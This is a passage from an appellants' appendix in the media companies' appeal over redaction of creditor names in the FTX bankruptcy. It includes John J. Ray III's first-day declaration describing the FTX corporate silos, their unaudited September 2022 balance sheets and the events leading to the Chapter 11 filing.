Civil Action No. 23-682-CFC

# UNITED STATES DISTRICT COURT
# FOR THE DISTRICT OF DELAWARE

Bloomberg L.P., Dow Jones & Company, Inc.,
The New York Times Company, and The Financial Times Ltd.,

Appellants,

v.

FTX Trading Ltd.,
Alameda Research LLC,

Appellees.

On Appeal from the United States Bankruptcy Court for the District of Delaware
Bankruptcy Case No. 22-11068 (JTD)

# APPENDIX OF APPELLANTS BLOOMBERG L.P., DOW JONES & COMPANY, INC., THE NEW YORK TIMES COMPANY, AND THE FINANCIAL TIMES LTD.

David L. Finger (ID #2556)
Finger & Slanina, LLC
One Commerce Center
1201 N. Orange St., 7th fl.
Wilmington, DE 19801
302.573.2525
dfinger@delawgroup.com

*Counsel of Record for Appellants*

Katie Townsend (*pro hac vice*)
Adam A. Marshall (*pro hac vice*)
Reporters Committee for
Freedom of the Press
1156 15th St. NW, Ste. 1020
Washington, DC 20005
(202) 795-9300
ktownsend@rcfp.org
amarshall@rcfp.org

*Counsel for Appellants*

## TABLE OF CONTENTS

**Page(s)**

1.  Declaration of John J. Ray III in Support of Chapter 11
    Petitions and First Day Pleadings (D.I. 24) ....................................... A1–A30

2.  Debtors' Motion to Maintain a Consolidated List of Creditors
    and Redact Certain Confidential Information of Customers and
    Personal Information of Individuals
    (D.I. 45) ............................................................................................ A31–A43

3.  Consolidated List of Top-50 Creditors (D.I. 51-1) ........................... A44–A48

4.  Motion to Intervene for the Limited Purpose of Objecting to the
    Redaction of the Names of Debtors' Customer-Creditors
    (D.I. 196) .......................................................................................... A49–A59

5.  U.S. Trustee's Objection to Debtors' Motion to Maintain a
    Consolidated List of Creditors and Redact Certain Confidential
    Information of Customers and Personal Information of
    Individuals (D.I. 200) ...................................................................... A60–A94

    a.  Ex. A: FTX Privacy Policy  (D.I. 200-1) .............................. A95–A110

6.  Order Granting Media Parties' Motion to Intervene (D.I. 255) .............. A111

7.  Debtors' Reply in Support of Motion to Redact or Withhold
    Certain Confidential Information (D.I. 407) ................................ A112–A125

    a.  Ex. 1: Proposed Final Order (D.I. 407-1) ........................... A126–A131

8.  Declaration of Kevin M. Cofsky in Support of Debtors' Motion
    to Redact or Withhold Certain Confidential Information
    (D.I. 411) ....................................................................................... A132–A138

9.  Excerpts of January 11, 2023 Hearing Transcript (D.I. 489) ........ A139–A162

10.  Final Order (i) Authorizing Debtors to Maintain a Consolidated
     List of Creditors, (ii) Authorizing Debtors to Redact or
     Withhold Certain Confidential Information of Customers and
     Personal Information of Individuals on a Final Basis, and (iii)
     Granting Certain Related Relief (D.I. 545) ................................... A163–A168

11.  Ad Hoc Committee of Non-U.S. Customers' Motion to Seal
     (D.I. 1137) ................................................................................... A169–A187

12.  Media Intervenors' Objections to Ad Hoc Committee of Non-
     U.S. Customers' Motion to Seal (D.I. 1226) ............................... A188–A216

13.  Joint Motion of Debtors and the Official Committee of
     Unsecured Creditors to Redact or Withhold Certain
     Confidential Information of Customers and Personal
     Information of Individuals ("Joint Motion to Seal")
     (D.I. 1324) ................................................................................... A217–A240

14.  Declaration of Jeremy A. Sheridan in Support of Joint Motion
     to Seal (D.I. 1325) ....................................................................... A241–A256

         a.  Sheridan Declaration, Exs. E, F, H, I, P (D.I. 1325-1) ....... A257–A476

15.  Media Intervenors' Objections to Joint Motion to Seal
     (D.I. 1406) ................................................................................... A477–A489

16.  U.S. Trustee's Omnibus Objection to (a) Joint Motion to Seal
     and (b) Ad Hoc Committee of Non-U.S. Customers' Motion
     to Seal (D.I. 1467) ....................................................................... A490–A500

17.  Excerpts of June 8, 2023 Hearing Transcript (D.I. 1611) ............. A501–A540

18.  Excerpts of June 9, 2023 Hearing Transcript (D.I. 1612) ............. A541–A699

19.  Order Authorizing Movants to Redact or Withhold Certain
     Confidential Information of Customers and Personal
     Information of Individuals (D.I. 1643) ......................................... A700–A704

20.  Media Intervenors' Notice of Appeal (D.I. 1688) ........................ A705–A707

# IN THE UNITED STATES BANKRUPTCY COURT
## FOR THE DISTRICT OF DELAWARE

| | |
|---|---|
| In re: | Chapter 11 |
| FTX TRADING LTD., *et al.*,[1] | Case No. 22-11068 (JTD) |
| Debtors. | (Joint Administration Pending) |

## DECLARATION OF JOHN J. RAY III IN SUPPORT OF
## CHAPTER 11 PETITIONS AND FIRST DAY PLEADINGS

I, John J. Ray III, hereby declare under penalty of perjury as follows:

1.      I am the Chief Executive Officer of the above-captioned debtors and debtors-in-possession (collectively, the "Debtors"), having accepted this position in the early morning hours of November 11, 2022.  I am administering the interests and affairs of the Debtors from my offices in the United States.

2.      My first official act in these roles was to authorize the chapter 11 filings of the Debtors and the commencement of the above-captioned chapter 11 cases (the "Chapter 11 Cases").

3.      Since my appointment, I have worked around the clock with teams of professionals at Alvarez & Marsal, Sullivan & Cromwell, Nardello & Co., Chainalysis, Kroll and a confidential cybersecurity firm, to secure the assets of the Debtors wherever located, to identify reliable books and records, to assemble the information necessary to provide to this Court, and to respond to numerous inquiries from multiple regulators and government authorities including the

---

[1]      The last four digits of FTX Trading Ltd.'s tax identification number are 3288.  Due to the large number of debtor entities in these Chapter 11 Cases, a complete list of the Debtors and the last four digits of their federal tax identification numbers is not provided herein.  A complete list of such information may be obtained on the website of the Debtors' proposed claims and noticing agent at https://cases.ra.kroll.com/FTX.

U.S. Commodity Futures Trading Commission ("CFTC"), the U.S. Attorney's Office for the Southern District of New York, the U.S. Securities and Exchange Commission ("SEC"), and the U.S. Congress, among others.

4. I have over 40 years of legal and restructuring experience. I have been the Chief Restructuring Officer or Chief Executive Officer in several of the largest corporate failures in history. I have supervised situations involving allegations of criminal activity and malfeasance (Enron). I have supervised situations involving novel financial structures (Enron and Residential Capital) and cross-border asset recovery and maximization (Nortel and Overseas Shipholding). Nearly every situation in which I have been involved has been characterized by defects of some sort in internal controls, regulatory compliance, human resources and systems integrity.

5. Never in my career have I seen such a complete failure of corporate controls and such a complete absence of trustworthy financial information as occurred here. From compromised systems integrity and faulty regulatory oversight abroad, to the concentration of control in the hands of a very small group of inexperienced, unsophisticated and potentially compromised individuals, this situation is unprecedented.

6. These Chapter 11 Cases have five core objectives:

(a) **Implementation of Controls**: the implementation of accounting, audit, cash management, cybersecurity, human resources, risk management, data protection and other systems that did not exist, or did not exist to an appropriate degree, prior to my appointment;

(b) **Asset Protection & Recovery**: the location and security of property of the estate, a substantial portion of which may be missing or stolen;

(c) **Transparency and Investigation**: the pending, comprehensive, transparent and deliberate investigation into claims against Mr. Samuel Bankman-Fried, the other co-founders of the Debtors and third parties, in

-2-

coordination with regulatory stakeholders in the United States and around the world;

(d) **Efficiency and Coordination:** cooperation and coordination with insolvency proceedings of subsidiary companies in other jurisdictions; and

(e) **Maximization of Value:** the maximization of value for all stakeholders through the eventual reorganization or sale of the Debtors' complex array of businesses, investments and digital and physical property.

These proceedings in the District of Delaware are the appropriate means to accomplish each of these objectives.

7. Except as otherwise indicated herein, all facts set forth in this declaration (the "Declaration") are based on my personal knowledge, my review of relevant materials in the Debtors' files or my opinion based on my experience, knowledge and information concerning the Debtors' operations and financial affairs. I am over the age of 18 and authorized to submit this Declaration on behalf of each of the Debtors.

8. For the reasons explained below, the Debtors expect to provide supplemental declarations as to the subject matter of this Declaration in connection with future motions as more information becomes available to the Debtors, stakeholders and the Court.

## I.  THE PREPETITION DEBTORS

### A.  Corporate Organization and Identification of Four Silos

9. For purposes of managing the Debtors' affairs, I have identified four groups of businesses, which I refer to as "Silos." These Silos include: (a) a group composed of Debtor West Realm Shires Inc. and its Debtor and non-Debtor subsidiaries (the "WRS Silo"), which includes the businesses known as "FTX US," "LedgerX," "FTX US Derivatives," "FTX US Capital Markets," and "Embed Clearing," among other businesses; (b) a group composed of Debtor Alameda Research LLC and its Debtor subsidiaries (the "Alameda Silo"); (c) a group composed of Debtor Clifton Bay Investments LLC, Debtor Clifton Bay Investments Ltd., Debtor

-3-

Island Bay Ventures Inc. and Debtor FTX Ventures Ltd. (the "Ventures Silo"); and (d) a group composed of Debtor FTX Trading Ltd. and its Debtor and non-Debtor subsidiaries (the "Dotcom Silo"), including the exchanges doing business as "FTX.com" and similar exchanges in non-U.S. jurisdictions. These Silos together are referred to by me as the "FTX Group."

10. Each of the Silos was controlled by Mr. Bankman-Fried.[2] Minority equity interests in the Silos were held by Zixiao "Gary" Wang and Nishad Singh, the co-founders of the business along with Mr. Bankman-Fried. The WRS Silo and Dotcom Silo also have third party equity investors, including investment funds, endowments, sovereign wealth funds and families. To my knowledge, no single investor other than the co-founders owns more than 2% of the equity of any Silo.[3]

11. The diagram attached as Exhibit A provides a visual summary of the Silos and the indicative assets in each Silo. Exhibit B contains a preliminary corporate structure chart. These materials were prepared at my direction based on information available at this time and are subject to revision as our investigation into the affairs of the FTX Group continues.

**B.     The WRS Silo**

12. The WRS Silo includes FTX US, an exchange for spot trading in digital assets and tokens. FTX US was founded in January 2020. FTX US is available to U.S. users

---

[2]     To my knowledge, Mr. Bankman-Fried owns (a) directly, approximately 53% of the equity in Debtor West Realm Shires Inc.; (b) indirectly, approximately 75% of the equity in Debtor FTX Trading Ltd.; (c) directly, approximately 90% of the equity in Debtor Alameda Research LLC; and (d) directly, approximately 67% of the equity in Clifton Bay Investments LLC.

[3]     Based on the information provided to me, the only Debtors that have received third party equity investments are Debtor FTX Trading Ltd. (Dotcom Silo) and Debtor West Realm Shires Inc. (WRS Silo). To my knowledge, (a) approximately 25% of the equity in Debtor FTX Trading Ltd. is owned by a dispersed group of approximately 600 third party equity investors and (b) approximately 22.25% of the equity in Debtor West Realm Shires Inc. is owned by a dispersed group of approximately 570 third party equity investors. FTX Trading Ltd also acquired 51% of Blockfolio, Inc. in 2020, with the remaining 49% of Blockfolio, Inc. owned by the original shareholders.

-4-

**A0004**

and, according to statements by Mr. Bankman-Fried, had approximately one million users as of August 2022.  FTX US's spot exchange is registered with the Department of the Treasury (via the Financial Crimes Enforcement Network) as a money services business and holds a series of state money transmission licenses in the United States.

13.     The WRS Silo also owns 100% of the equity interests in the LedgerX business, which is operated by non-Debtor LedgerX LLC (d/b/a FTX US Derivatives) ("LedgerX").  LedgerX offers futures, options, and swaps contracts on digital assets and other commodities to both U.S. and non-U.S. persons.  LedgerX operates with licenses from the CFTC.  Based on the information that I have reviewed at this time, LedgerX is solvent.

14.     The WRS Silo also owns 100% of the equity interests in non-Debtor FTX Capital Markets LLC, which is an SEC-registered broker-dealer.  Based on the information that I have reviewed at this time, FTX Capital Markets LLC is solvent.

15.     The WRS Silo also owns 100% of the equity interests in non-Debtor Embed Financial Technologies Inc., as well as its wholly-owned non-Debtor subsidiary Embed Clearing LLC, which operates as a securities clearing firm and is an SEC-registered broker-dealer.  Based on the information that I have reviewed at this time, each of these non-Debtor entities is solvent.

16.     The WRS Silo also owns 100% of the equity interests in FTX Value Trust Company, a South Dakota Trust Company, which provides custodial services.  Based on the information that I have reviewed at this time, this non-Debtor company is solvent.

17.     The WRS Silo also owns 100% of other Debtor and non-Debtor companies operating miscellaneous businesses, such as video game development and a market place for trading non-fungible tokens.  Finally, the WRS Silo has made loans and investments,

including a loan of FTT tokens to BlockFi Inc. in a principal amount of FTT tokens valued at $250 million as of September 30, 2022.

18.     I have been provided with an unaudited consolidated balance sheet for the WRS Silo as of September 30, 2022, which is the latest balance sheet available.  The balance sheet shows $1.36 billion in total assets as of that date.  However, because this balance sheet was produced while the Debtors were controlled by Mr. Bankman-Fried, I do not have confidence in it, and the information therein may not be correct as of the date stated.

19.     The chart below summarizes certain information regarding the WRS Silo's consolidated assets as reflected in the September 30, 2022 balance sheet:

| WRS Silo Consolidated Assets as of September 30, 2022 | |
|---|---|
| *Current Assets* | |
| Cash and Cash Equivalents | $144,207 |
| Restricted Cash | $267,738 |
| U.S. Dollar Denominated Stablecoins | $68,035 |
| Customer Custodial Funds | $102,225 |
| Accounts Receivable | $2,978 |
| Accounts Receivable, Related Party | $71,563 |
| Loans Receivable | $250,000 |
| Prepaid Expenses and Other Current Assets | $21,448 |
| Crypto Assets Held at Fair Value | $1,026 |
| **Total Current Assets** | **$929,220** |
| Property and Equipment, Net | $2,017 |
| Other Non-Current Assets | $429,428 |
| **Total Assets** | **$1,360,665** |

(1)     Amounts shown in thousands of U.S. Dollars.

(2)     In the above table, assets shown reflect the elimination of intercompany entries within and between the WRS Silo and Dotcom Silo.

(3)     Restricted cash at the WRS Silo is primarily comprised of approximately $250 million in restricted funds at non-Debtor LedgerX.

(4)     Customer custodial fund assets are comprised of fiat customer deposit balances.  **Balances of customer crypto assets deposited were not recorded as assets on the balance sheet and are not presented**.

(5)     Loans receivable of $250 million consists of a loan by Debtor West Realm Shires Inc. to BlockFi Inc. of $250 million in FTT tokens.

(6)     Intangible assets (in the amount of $229 million) are not reflected above.  These consist of values attributable to customer relationships and trade names.

4892-0827-0654 v.2

(7)   Goodwill balance (in the amount of $135 million) is not reflected above.

20.    To my knowledge, the WRS Silo Debtors do not have any long-term or funded debt.  The WRS Silo Debtors are expected to have significant liabilities arising from crypto assets deposited by customers through the FTX US platform.  However, such liabilities are not reflected in the financial statements prepared while these companies were under the control of Mr. Bankman-Fried.  The chart below summarizes certain information regarding the WRS Silo's consolidated liabilities as reflected in the September 30, 2022 balance sheet:

| WRS Silo Consolidated Liabilities as of September 30, 2022 | |
|---|---|
| *Current Liabilities* | |
| Accounts Payable and Accrued Expenses | $6,014 |
| Accounts Payable, Related Party | $124,221 |
| Custodial Funds Due to Customers | $102,225 |
| Purchase Consideration Payable | — |
| Loan Payable | — |
| Lease Liability, Current | $1,672 |
| Crypto Asset Borrowings at Fair Value | $1,737 |
| **Total Current Liabilities** | **$235,869** |
| Lease Liability, Non-Current | $9,399 |
| Deferred Taxes | $20,185 |
| Contract Liability | $887 |
| SAFE Note, Related Party, Non-Current | $50,000 |
| Other Non-Current Liabilities | — |
| **Total Liabilities** | **$316,014** |

(1)   Amounts shown in thousands of U.S. Dollars.

(2)   In the above table, liabilities shown reflect the elimination of intercompany entries within and between the WRS Silo and Dotcom Silo.

(3)   Customer custodial fund liabilities are comprised of fiat customer deposit balances.  **Balances of customer crypto assets deposited are not presented.**

21.    All Debtors and non-Debtors in the WRS Silo are organized in the State of Delaware, other than non-Debtor FTX Vault Trust Company, which is a South Dakota Trust Company.

-7-

### C.    The Alameda Silo

22.    The parent company and primary operating company in the Alameda Silo is Alameda Research LLC, which is organized in the State of Delaware.  Before the Petition Date (as defined below), the Alameda Silo operated quantitative trading funds specializing in crypto assets.  Strategies included arbitrage, market making, yield farming and trading volatility.  The Alameda Silo also offered over-the-counter trading services, and made and managed other debt and equity investments.  In short, the Alameda Silo was a "crypto hedge fund" with a diversified business trading and speculating in digital assets and related loans and securities for the account of its owners, Messrs. Bankman-Fried (90%) and Wang (10%).

23.    Alameda Research LLC prepared consolidated financial statements on a quarterly basis.  To my knowledge, none of these financial statements have been audited.  The September 30, 2022 balance sheet for the Alameda Silo shows $13.46 billion in total assets as of its date.  However, because this balance sheet was unaudited and produced while the Debtors were controlled by Mr. Bankman-Fried, I do not have confidence in it and the information therein may not be correct as of the date stated.

24.    The chart below summarizes certain information regarding the Alameda Silo's consolidated assets as reflected in the September 30, 2022 balance sheet:

| Alameda Silo Consolidated Assets as of September 30, 2022 | |
|---|---|
| *Current Assets* | |
| Cash and Cash Equivalents | $547,964 |
| Restricted Cash | - |
| U.S. Dollar Denominated Stablecoins | - |
| Customer Custodial Funds | - |
| Investments | $3,976,632 |
| Accounts Receivable | $10,845 |
| Accounts Receivable, Related Party | $427,323 |
| Loans Receivable | $41,607 |
| Loans Receivable, Related Party | $4,102,365 |
| Prepaid Expenses and Other Current Assets | $1,083 |
| Crypto Assets Held at Fair Value | $4,084,886 |

-8-

| | |
|---|---|
| **Total Current Assets** | **$13,192,706** |
| Property and Equipment, Net | $26,763 |
| Other Non-Current Assets | $239,696 |
| **Total Assets** | **$13,459,165** |

(1)  Amounts shown in thousands of U.S. Dollars.

(2)  In the above table, intercompany accounts receivable, accounts payable, loans payable, and loans receivable are not presented.

(3)  Related Party Loans Receivable of $4.1 billion at Alameda Research (consolidated) consisted primarily of a loan by Euclid Way Ltd. to Paper Bird Inc. (a Debtor) of $2.3 billion and three loans by Alameda Research Ltd.: one to Mr. Bankman-Fried, of $1 billion; one to Mr. Singh, of $543 million; and one to Ryan Salame, of $55 million.

25.   The chart below summarizes certain information regarding the Alameda Silo's consolidated liabilities as reflected in the September 30, 2022 balance sheet:

| **Alameda Silo** |  |
|---|---|
| **Consolidated Liabilities as of September 30, 2022** |  |
| *Current Liabilities* | |
| Accounts Payable and Accrued Expenses | $916,305 |
| Accounts Payable, Related Party | $75,900 |
| Custodial Funds Due to Customers | $309,634 |
| Purchase Consideration Payable | - |
| Loans Payable | - |
| Loans Payable, Related Party | $13,762 |
| Lease Liability, Current | - |
| Crypto Asset Borrowings at Fair Value | $3,773,979 |
| **Total Current Liabilities** | **$5,089,579** |
| Lease Liability, Non-Current | - |
| Deferred Taxes | - |
| Contract Liability | - |
| SAFE Note, Related Party, Non-Current | - |
| Other Non-Current Liabilities | - |
| **Total Liabilities** | **$5,089,579** |

(1)  Amounts shown in thousands of U.S. Dollars.

(2)  In the above table, intercompany accounts receivable, accounts payable, loans payable, and loans receivable are not presented.

26.   As mentioned above, Alameda Research LLC is organized in the State of Delaware.  The other Debtors in the Alameda Silo are organized in Delaware, Korea, Japan, the British Virgin Islands, Antigua, Hong Kong, Singapore, the Seychelles, the Cayman Islands, the Bahamas, Australia, Panama, Turkey and Nigeria.

4892-0827-0654 v.2

## D.     The Ventures Silo

27.     The Debtors in the Ventures Silo make and manage private investments. The investments are held in Debtors Clifton Bay Investments, LLC, Clifton Bay Investments Ltd., FTX Ventures Ltd., Island Bay Ventures Inc. and, potentially, affiliated companies.

28.     To my knowledge, Debtors Clifton Bay Investments, LLC and FTX Ventures Ltd. prepared financial statements on a quarterly basis.  The September 30, 2022 balance sheet for Debtor Clifton Bay Investments LLC shows assets with a total value of $1.52 billion as of its date, and the September 30, 2022 balance sheet for FTX Ventures Ltd. shows assets with a total value of $493 million as of its date.  To my knowledge, none of these financial statements have been audited.  Because these balance sheets were unaudited and produced while the Debtors were controlled by Mr. Bankman-Fried, I do not have confidence in them, and the information therein may not be correct as of the date stated.

29.     I have not been able to locate financial statements for Island Bay Ventures Inc.

30.     The chart below summarizes certain information regarding the Ventures Silo's assets as reflected in the September 30, 2022 balance sheets, excluding any assets held by Island Bay Ventures Inc.

| Ventures Silo Consolidated Assets as of September 30, 2022 | | |
|---|---|---|
| | **Clifton Bay Investments LLC (consolidated)** | **FTX Ventures Ltd** |
| *Current Assets* | | |
| Cash and Cash Equivalents | $245 | $261 |
| Restricted Cash | - | - |
| U.S. Dollar Denominated Stablecoins | - | - |
| Customer Custodial Funds | - | - |
| Investments | $1,492,856 | $397,861 |
| Accounts Receivable | - | - |
| Accounts Receivable, Related Party | $10,200 | - |

-10-

| | | |
|---|---|---|
| Loans Receivable | $16,810 | - |
| Loans Receivable, Related Party | - | - |
| Prepaid Expenses and Other Current Assets | - | - |
| Crypto Assets Held at Fair Value | - | $95,337 |
| **Total Current Assets** | **$1,520,111** | **$493,459** |
| Property and Equipment, Net | - | - |
| Other Non-Current Assets | - | - |
| **Total Assets** | **$1,520,111** | **$493,459** |

(1)    Amounts shown in thousands of U.S. Dollars.

(2)    In the above table, intercompany accounts receivable, accounts payable, loans payable, and loans receivable are not presented.

31.    The chart below summarizes certain information regarding the Ventures

Silo's liabilities as reflected in the September 30, 2022 balance sheets excluding any liabilities of

Island Bay Ventures Inc.:

| Ventures Silo Consolidated Liabilities as of September 30, 2022 | | |
|---|---|---|
| | Clifton Bay Investments LLC (Consolidated) | FTX Ventures Ltd |
| *Current Liabilities* | | |
| Accounts Payable and Accrued Expenses | $44 | - |
| Accounts Payable, Related Party | $1,519,283 | $129,518 |
| Custodial Funds Due to Customers | - | - |
| Purchase Consideration Payable | - | - |
| Loans Payable | - | - |
| Loans Payable, Related Party | - | $362,915 |
| Lease Liability, Current | - | - |
| Crypto Asset Borrowings at Fair Value | - | - |
| **Total Current Liabilities** | **$1,519,326** | **$492,432** |
| Lease Liability, Non-Current | - | - |
| Deferred Taxes | - | - |
| Contract Liability | - | - |
| SAFE Note, Related Party, Non-Current | - | - |
| Other Non-Current Liabilities | - | - |
| **Total Liabilities** | **$1,519,326** | **$492,432** |

(1)    Amounts shown in thousands of U.S. Dollars.

(2)    In the above table, intercompany accounts receivable, accounts payable, loans payable, and loans receivable are not presented.

(3)    Related Party Accounts Payable at Clifton Bay Investments LLC consists of four related-party balances: one with Debtor Alameda Research Ltd, of $1,400 million; one with Debtor Alameda Research LLC, of $68.6 million; one with Debtor Alameda Ventures Ltd, of $38.5 million; and one with Debtor West Realm Shires Services Inc. of $2.25 million.

-11-

(4)    Customer custodial fund liabilities are comprised of fiat customer deposit balances.  **Balances of customer crypto assets deposited are not presented**.

       32.    All Debtors in the Ventures Silo are organized in the State of Delaware or the British Virgin Islands.

### E.    The Dotcom Silo

       33.    The Dotcom Silo includes FTX.com, the trade name for the business conducted by the parent company in the Dotcom Silo, FTX Trading Ltd., which is organized in Antigua.  FTX.com is a digital asset trading platform and exchange.  It was founded by Messrs. Bankman-Fried, Wang and Singh and commenced operations in May 2019.  The Dotcom Silo also holds certain marketplace licenses and registrations in certain non-U.S. jurisdictions, including the European Union and Japan.  The FTX.com platform is not available to U.S. users.

       34.    In addition to its core digital asset exchange, the Dotcom Silo offered an off-exchange portal that enabled users to connect and request quotes for spot digital assets and trade directly.  The portal enabled users to lend their digital assets to other users for spot trading and matched users wanting to borrow with those willing to lend.

       35.    The FTX.com platform grew quickly since its launch to become one of the largest cryptocurrency exchanges in the world.  Mr. Bankman-Fried claimed that, by the end of 2021, around $15 billion of assets were on the platform, which according to him handled approximately 10% of global volume for crypto trading at the time.  Mr. Bankman-Fried also claimed that FTX.com, as of July 2022, had "millions" of registered users.  These figures have not been verified by my team.

       36.    The Dotcom Silo's unaudited consolidated balance sheet as of September 30, 2022 is the latest balance sheet that was provided to me with respect to the Dotcom Silo.  It shows total assets of $2.25 billion as of September 30, 2022.  Because such balance sheet was

4892-0827-0654 v.2

**A0012**

produced while the Debtors were controlled by Mr. Bankman-Fried, I do not have confidence in it, and the information therein may not be correct as of the date stated.

37.     The chart below summarizes certain information regarding the Dotcom Silo's consolidated assets as reflected in the September 30, 2022 balance sheet:

| Dotcom Silo Consolidated Assets as of September 30, 2022 | |
|---|---:|
| *Current Assets* | |
| Cash and Cash Equivalents | $483,724 |
| Restricted Cash | $10,188 |
| U.S. Dollar Denominated Stablecoins | $1,140,795 |
| Customer Custodial Funds | – |
| Accounts Receivable | $9,459 |
| Accounts Receivable, Related Party | $188,155 |
| Loans Receivable | $103,949 |
| Prepaid Expenses and Other Current Assets | $42,661 |
| Crypto Assets Held at Fair Value | $659 |
| **Total Current Assets** | **$1,979,590** |
| Property and Equipment, Net | $256,996 |
| Other Non-Current Assets | $22,148 |
| **Total Assets** | **$2,258,734** |

(1)     Amounts shown in thousands of U.S. Dollars.

(2)     The balance sheet for non-Debtor FTX Digital Markets Ltd. is consolidated to Debtor FTX Trading Ltd.'s balance sheet. The September 30, 2022 Balance Sheet of non-Debtor FTX Digital Markets Ltd. reflects an asset position of $149,336, as follows: Cash and Cash Equivalents ($82,564), Restricted Cash ($10,000), U.S. Dollar Denominated Stablecoins ($63), Related Party Receivables ($45,944), Prepaid Expenses and Other Current Assets ($4,922), Property and Equipment, Net ($5,565) and Other Non-Current Assets ($278) (amounts in thousands of U.S. Dollars).

(3)     Non-debtor FTX Digital Markets Ltd. has a net intercompany accounts payable of $30 million due to entities controlled by Debtor FTX Trading Ltd.

(4)     In the above table, assets shown reflect the elimination of intercompany entries within and between the WRS Silo and Dotcom Silo.

(5)     Customer custodial fund assets are comprised of fiat customer deposit balances. **Balances of customer crypto assets deposited are not presented.**

(6)     Loans Receivable of $250 million at FTX US consists of a loan to BlockFi Inc. of $250 million in FTT tokens.

(7)     Intangible assets (in the amount of $343 million) are not reflected above. These consist of values attributable to customer relationships and trade names.

(8)     Goodwill balance (in the amount of $359 million) is not reflected above.

38.     To my knowledge, the Dotcom Silo Debtors do not have any long-term or funded debt. The Dotcom Silo Debtors may have significant liabilities to customers through the

FTX.com platform. However, such liabilities are not reflected in the financial statements prepared by these companies while they were under the control of Mr. Bankman-Fried. The chart below summarizes certain information regarding the Dotcom Silo's consolidated liabilities as reflected in the September 30, 2022 balance sheet:

| Dotcom Silo Consolidated Liabilities as of September 30, 2022 | |
| --- | --- |
| *Current Liabilities* | |
| Accounts Payable and Accrued Expenses | $38,970 |
| Accounts Payable, Related Party | $125,626 |
| Custodial Funds Due to Customers | – |
| Purchase Consideration Payable | $26,970 |
| Loan Payable | $124,298 |
| Lease Liability, Current | $23 |
| Crypto Asset Borrowings at Fair Value | $149,723 |
| **Total Current Liabilities** | **$465,610** |
| Lease Liability, Non-Current | – |
| Deferred Taxes | – |
| Contract Liability | – |
| SAFE Note, Related Party, Non-Current | – |
| Other Non-Current Liabilities | $46 |
| **Total Liabilities** | **$465,656** |

(1)    Amounts shown in thousands of U.S. Dollars.

(2)    In the above table, liabilities shown reflect the elimination of intercompany entries within and between the WRS Silo and Dotcom Silo.

(3)    The balance sheet for non-Debtor FTX Digital Markets Ltd. is consolidated to Debtor FTX Trading Ltd.'s balance sheet. The September 30, 2022 Balance Sheet of non-Debtor FTX Digital Markets Ltd. reflects total liabilities in the amount of $1,278, as follows: Accounts Payable and Accrued Expenses ($1,259), Accounts Payable, Related Party ($19) (amounts in thousands of U.S. Dollars).

(4)    Customer custodial fund liabilities are comprised of fiat customer deposit balances. **Balances of customer crypto assets deposited were not recorded as assets on the balance sheet and are not presented.**

39.    The Debtors in the Dotcom Silo are organized in jurisdictions around the world, with the parent company FTX Trading Ltd. organized in Antigua. The Debtors in the Dotcom Silo also own 100% of the equity interests in over a dozen non-Debtor companies.

## II.    EVENTS LEADING TO CHAPTER 11 FILING

40.    The Debtors faced a severe liquidity crisis that necessitated the filing of these Chapter 11 Cases on an emergency basis on November 11, 2022, and in the case of Debtor

-14-

West Realm Shires Inc., on November 14, 2022 (collectively, the "Petition Date"). In the days leading up to the Petition Date, certain of the circumstances described in Part III below became known to a broader set of executives of the FTX Group beyond Mr. Bankman-Fried and members of his inner circle. Questions arose about Mr. Bankman-Fried's leadership and the handling of the Debtors' complex array of assets and businesses.

41. As the situation became increasingly dire, Sullivan & Cromwell and Alvarez & Marsal were engaged to provide restructuring advice and services to the Debtors.

42. On November 10, 2022, the Securities Commission of the Bahamas (the "SCB") took action to freeze assets of non-Debtor FTX Digital Markets Ltd., a service provider to FTX Trading Ltd. and the employer of certain current and former executives and staff in the Bahamas. Mr. Brian Simms, K.C. was appointed as provisional liquidator of FTX Digital Markets Ltd. on a sealed record. The provisional liquidator for this Bahamas subsidiary has filed a chapter 15 petition seeking recognition of the provisional liquidation proceeding in the Bankruptcy Court for the Southern District of New York.

43. In addition, in the first hours of November 11, 2022 EST, the directors of non-Debtors FTX Express Pty Ltd and FTX Australia Pty Ltd., both Australian entities, appointed Messrs. Scott Langdon, John Mouawad and Rahul Goyal of KordaMentha Restructuring as voluntary administrators.

44. At the same time, negotiations were being held between certain senior individuals of the FTX Group and Mr. Bankman-Fried concerning the resignation of Mr. Bankman-Fried and the commencement of these Chapter 11 Cases. Mr. Bankman-Fried consulted with numerous lawyers, including lawyers at Paul, Weiss, Rifkind, Wharton & Garrison LLP, other legal counsel and his father, Professor Joseph Bankman of Stanford Law

-15-

School.  A document effecting a relinquishment of control was prepared and comments from Mr. Bankman-Fried's team incorporated.  At approximately 4:30 a.m. EST on Friday, November 11, 2022, after further consultation with his legal counsel, Mr. Bankman-Fried ultimately agreed to resign, resulting in my appointment as the Debtors' CEO.  I was delegated all corporate powers and authority under applicable law, including the power to appoint independent directors and commence these Chapter 11 Cases on an emergency basis.

45.     Other than the proceedings in the Bahamas and Australia, to my knowledge, no other Debtor or non-Debtor subsidiary is subject to other insolvency proceedings at this time.

## III.     ACTION TAKEN SINCE MR. BANKMAN-FRIED'S DEPARTURE

### A.     New Governance Structure

46.     Many of the companies in the FTX Group, especially those organized in Antigua and the Bahamas, did not have appropriate corporate governance.  I understand that many entities, for example, never had board meetings.

47.     The following new independent directors (the "Directors") have been appointed as directors of the primary companies in the FTX Group:

(a)     **WRS Silo:  Mitchell I. Sonkin:**  Mitchell Sonkin is currently a Senior Advisor to MBIA Insurance Corporation in connection with the restructuring of the Firm's insured portfolio exposure of the Commonwealth of Puerto Rico's $72 billion of outstanding debt. He is also currently Chairman of the Board of the ResCap Liquidating Trust, successor to ResCap and GMAC Mortgage Corporations. Before joining MBIA, Mr. Sonkin was a senior partner at the international law firm, King & Spalding, where he was co-chair of King & Spalding's Financial Restructuring Group and a member of the firm's Policy Committee. He has over 40 years of experience in U.S. and international bond issuances, corporate reorganizations, bankruptcies and other debt restructurings and has served as a bankruptcy-court-appointed examiner. In particular, he has played a significant role in numerous municipal, utility, insurance, airline, healthcare debt and international debt restructurings including the Anglo/French Euro Tunnel debt reorganization.

-16-

**A0016**

